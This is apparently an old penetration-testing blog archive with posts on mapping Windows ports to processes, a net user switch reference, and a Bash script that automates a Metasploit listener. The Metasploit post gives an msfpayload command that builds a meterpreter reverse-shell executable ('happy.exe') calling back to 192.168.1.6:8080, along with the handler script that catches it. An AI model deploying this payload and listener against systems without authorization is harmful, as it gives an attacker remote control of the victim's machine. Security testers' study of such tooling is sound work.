Sunday, August 15, 2010

Windows Associated PID with Port

Unlike the convenient netstat -anp on Linux, Windows makes the same task a two-step job:

netstat -ano                          (lists each socket together with the PID that owns it)

tasklist /svc /FI "PID eq [pid]"      (shows the process image and any services hosted by that PID; use the PID from the netstat output, not the port number)
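To make that two-step lookup reproducible, and to handle the UDP rows (which have no State column), here is an added Python example; it is not code from the original post. It parses text in the column layout of netstat -ano and tasklist /svc and joins the two so a port resolves to PID, image name and hosted services. The sample outputs, process names and PIDs below are constructed, and the function names are my own.

```python
import re

# Constructed sample in the shape of `netstat -ano` output (not captured from a real host).
NETSTAT_SAMPLE = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       820
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    192.168.1.20:49210     192.168.1.6:8080       ESTABLISHED     3344
  TCP    [::]:135               [::]:0                 LISTENING       820
  UDP    0.0.0.0:500            *:*                                    1100
"""

# Constructed sample in the shape of `tasklist /svc` output.
TASKLIST_SAMPLE = """
Image Name                     PID Services
========================= ======== ============================================
System Idle Process              0 N/A
System                           4 N/A
svchost.exe                    820 RpcEptMapper, RpcSs
svchost.exe                   1100 IKEEXT, PolicyAgent
happy.exe                     3344 N/A
"""


def parse_netstat(text):
    """Return a list of (proto, local, remote, state, pid) tuples.

    TCP rows carry five columns; UDP rows have no State column, so a
    four-column row gets an empty state rather than being mis-aligned.
    """
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if not parts or parts[0] not in ("TCP", "UDP"):
            continue  # blank line, "Active Connections" banner, or column header
        if len(parts) == 5:
            proto, local, remote, state, pid = parts
        elif len(parts) == 4:
            proto, local, remote, pid = parts
            state = ""
        else:
            continue
        rows.append((proto, local, remote, state, int(pid)))
    return rows


# Image name (may contain spaces), PID, then the comma-separated service list or N/A.
TASKLIST_RE = re.compile(r"^(.*?)\s+(\d+)\s+(.*?)\s*$")


def parse_tasklist(text):
    """Return {pid: (image_name, [service, ...])} from `tasklist /svc` output."""
    procs = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("Image Name") or line.startswith("="):
            continue
        m = TASKLIST_RE.match(line)
        if not m:
            continue
        image, pid, services = m.groups()
        svc_list = [] if services == "N/A" else [s.strip() for s in services.split(",")]
        procs[int(pid)] = (image, svc_list)
    return procs


def port_owners(netstat_text, tasklist_text):
    """Join both outputs into {(proto, local_address): (pid, image, services)}."""
    procs = parse_tasklist(tasklist_text)
    owners = {}
    for proto, local, _remote, _state, pid in parse_netstat(netstat_text):
        image, services = procs.get(pid, ("<not in tasklist>", []))
        owners[(proto, local)] = (pid, image, services)
    return owners


def who_listens_on(port, netstat_text, tasklist_text, proto="TCP"):
    """Return (pid, image, services) for every socket of `proto` bound to `port`.

    rsplit on the last colon keeps IPv6 addresses such as [::]:135 intact.
    """
    hits = []
    for (p, local), info in port_owners(netstat_text, tasklist_text).items():
        if p == proto and local.rsplit(":", 1)[1] == str(port):
            hits.append(info)
    return hits


if __name__ == "__main__":
    for (proto, local), (pid, image, svcs) in port_owners(NETSTAT_SAMPLE, TASKLIST_SAMPLE).items():
        print(f"{proto:<4} {local:<24} pid={pid:<6} {image:<20} {', '.join(svcs) or '-'}")
```

On a real host, redirect each command's output to a file and pass the text in. An image that hosts no service yet holds an established outbound connection (happy.exe in the constructed sample) is the kind of row to triage first.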


Monday, August 9, 2010

Automating Metasploit with Shell Scripting

Created a small shell script to automate the multi/handler in Metasploit. It pairs with an executable built by msfpayload, for example: ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.6 LPORT=8080 X > happy.exe (the script's LHOST and LPORT must match the values baked into the payload).

#!/bin/bash
# Starts a Metasploit multi/handler listener for the payload configured below.
# LHOST/LPORT must match the values used when the payload was generated.

MSF_PATH="/pentest/exploits/framework3/"
MSFCLI="${MSF_PATH}msfcli"
INTERFACE="eth0"
LPORT="8080"
PAYLOAD="windows/meterpreter/reverse_tcp"

echo "Metasploit multi/handler"

# Pull the IPv4 address of $INTERFACE from net-tools ifconfig output
# (the "inet addr:x.x.x.x" line); this is the address the payload connects back to.
LHOST=$(ifconfig "$INTERFACE" | grep "inet addr" | cut -d":" -f2 | cut -d" " -f1)
if [ -z "$LHOST" ]; then
    echo "Could not determine the IP address of $INTERFACE" >&2
    exit 1
fi
echo "LHOST=$LHOST"
echo "LPORT=$LPORT"

# Trailing E tells msfcli to execute the module immediately.
"$MSFCLI" multi/handler PAYLOAD="$PAYLOAD" LHOST="$LHOST" LPORT="$LPORT" E

Thursday, August 5, 2010

Windows net user commands reference

Reference: http://articles.techrepublic.com.com/5100-10878_11-5031577.html

Example: net user [account] /delete

/DOMAIN—Performs the operation on a domain controller of the current domain.
/ADD—Adds a user account to the user accounts database.
/DELETE—Removes a user account from the user accounts database.
/ACTIVE:—Type /ACTIVE:YES to activate the account. /ACTIVE:NO deactivates the account.
/COMMENT:"text"—You can use this command to provide a comment about the user. You can enter up to 48 characters as a description. Make sure you enclose the comment in quotation marks.
/COUNTRYCODE:—This switch allows you to change the operating system country code for the user. This will cause Windows to implement a language file for a user's help and error messages. A value of 0 signifies the default country code.
/EXPIRES:—This switch allows you to set an expiration date for the user. You can either enter a date in mm/dd/yyyy format or enter a value of NEVER. NEVER sets no expiration for the account.
/FULLNAME:"name"—This switch changes the user's full name, not the username. Replace name with the user's name enclosed in quotation marks.
/HOMEDIR:pathname—This switch sets the path (pathname) for the user's home directory. The path must already exist for the switch to work properly.
/PASSWORDCHG:—If you type /PASSWORDCHG:YES, users can change their own passwords. Conversely, setting it to NO disables password changing. The default is YES.
/PASSWORDREQ:—This switch specifies whether a user account must have a password. The default is YES, but you can type /PASSWORDREQ:NO to disable passwords for the account.
/PROFILEPATH:pathname—This switch sets a path for the user's logon profile.
/SCRIPTPATH:pathname—This switch sets the location of the user's logon script.
/TIMES:—This switch allows you to set the user's logon hours. If you set the value to ALL, the user can always log on. The syntax is reasonably complicated if you want to set available logon times. Times can only be expressed in one-hour increments. Starting times/days and ending times/days are separated by a dash (-). Days, and times in the same day, are separated by a comma (,). Multiple day/time combinations are separated by a semicolon (;). This might be a setting that would be more efficient using a GUI.
/USERCOMMENT:"text"—This switch sets the User Comment field shown above. Don't confuse it with the Comment switch just mentioned.
/WORKSTATIONS:—This switch allows you to specify workstation names the user can log in from. By default, a user can use any workstation. You can specify this explicitly by following this switch with an asterisk (*). To limit a user, type in individual workstation names. You can enter as many as eight workstation names, separating each one with a comma.
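The /TIMES: grammar is only described in prose above, so here is an added Python example, not from the original post or the referenced TechRepublic article, that expands a /TIMES: value into the set of permitted logon hours per weekday and rejects values that break the one-hour-increment rule. The separator rules (dash for ranges, comma within an entry, semicolon between entries) follow the description above; the day abbreviations M, T, W, Th, F, Sa, Su and the two accepted time formats (24-hour HH:MM and 12-hour Nam/Npm) are assumptions about what net user accepts, and the function names are my own.

```python
import re

# Assumed day abbreviations, Monday first (index 0).
DAYS = ["M", "T", "W", "Th", "F", "Sa", "Su"]
TIME_24H = re.compile(r"^(\d{1,2}):(\d{2})$")
TIME_12H = re.compile(r"^(\d{1,2})(am|pm)$", re.IGNORECASE)


def parse_hour(token):
    """Convert one time token to an hour in 0..24, rejecting sub-hour values."""
    m = TIME_24H.match(token)
    if m:
        hour, minute = int(m.group(1)), int(m.group(2))
        if minute != 0:
            raise ValueError(f"{token}: logon hours are limited to one-hour increments")
        if not 0 <= hour <= 24:
            raise ValueError(f"{token}: hour out of range")
        return hour
    m = TIME_12H.match(token)
    if m:
        hour, ampm = int(m.group(1)), m.group(2).lower()
        if not 1 <= hour <= 12:
            raise ValueError(f"{token}: hour out of range")
        hour %= 12                      # 12am -> 0, 12pm -> 12
        return hour + 12 if ampm == "pm" else hour
    raise ValueError(f"{token}: unrecognised time")


def parse_days(token):
    """Expand 'M' or 'M-F' into day indexes; an unknown abbreviation raises ValueError."""
    if "-" in token:
        start, end = token.split("-", 1)
        i, j = DAYS.index(start), DAYS.index(end)
        # A range such as Sa-M wraps around the end of the week.
        return list(range(i, j + 1)) if i <= j else list(range(i, 7)) + list(range(0, j + 1))
    return [DAYS.index(token)]


def parse_times(spec):
    """Return {day_index: set(hours)} for a /TIMES: value; ALL permits every hour."""
    if spec.strip().upper() == "ALL":
        return {d: set(range(24)) for d in range(7)}
    schedule = {d: set() for d in range(7)}
    for combo in spec.split(";"):            # semicolon separates day/time combinations
        combo = combo.strip()
        if not combo:
            continue
        tokens = [t.strip() for t in combo.split(",")]   # comma separates days and times
        day_tokens = [t for t in tokens if not any(c.isdigit() for c in t)]
        time_tokens = [t for t in tokens if any(c.isdigit() for c in t)]
        if not day_tokens or not time_tokens:
            raise ValueError(f"{combo!r}: each entry needs at least one day and one time range")
        days = [d for t in day_tokens for d in parse_days(t)]
        hours = set()
        for t in time_tokens:
            if "-" not in t:
                raise ValueError(f"{t}: time must be a start-end range")
            start, end = (parse_hour(x) for x in t.split("-", 1))
            if end <= start:
                raise ValueError(f"{t}: end must be later than start")
            hours.update(range(start, end))   # end hour itself is exclusive
        for d in days:
            schedule[d].update(hours)
    return schedule


def logon_allowed(schedule, day_index, hour):
    """True if the expanded schedule permits a logon at the given weekday and hour."""
    return hour in schedule[day_index]


def is_valid_times(spec):
    """Convenience wrapper: does the value parse under the rules above?"""
    try:
        parse_times(spec)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    sched = parse_times("M-F,08:00-17:00;Sa,10am-12pm")
    for d, name in enumerate(DAYS):
        print(f"{name:<2} {sorted(sched[d])}")
```

Expanding the value before applying it lets you diff the intended and effective logon windows on an account, which is a cheap check when reviewing service or shared accounts that should never be usable outside business hours.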

Smashing the Stack for Fun and Profit

Oldie but goodie; note to self to re-read this: